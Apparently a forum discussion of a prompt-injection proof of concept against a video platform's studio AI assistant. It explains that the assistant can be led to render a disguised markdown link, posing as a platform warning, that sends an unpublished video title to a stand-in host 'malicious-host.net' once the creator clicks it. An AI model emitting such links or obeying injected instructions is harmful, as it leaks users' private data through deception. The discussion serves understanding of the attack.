The described "attack" would not work, due to not triggering an HTTP request.
When an LLM generates text, it does not send requests to URL-looking strings it generates to validate they are real/live.
You'd never get your "ping" request.
The author is aware of that, the PoC requires interaction from the creator using the studio AI:
> When the creator clicked the link, I received a request with the video title in the URL parameter.
The LLM responds with rendered markdown, which conceals the actual link. It constructs it in such a way where the link looks like a message or warning from the YouTube platform, or perhaps something like
> Message response too large, click [here](malicious-host.net/blabla?video="Secret Unpublished Video")" to download
This is an environment where I suspect a majority of creators probably expect that untrusted links like this are possible, and assume anything the platform spits out is legitimate. So you are right that it relies on the creator clicking the link, but that is a very real possibility here.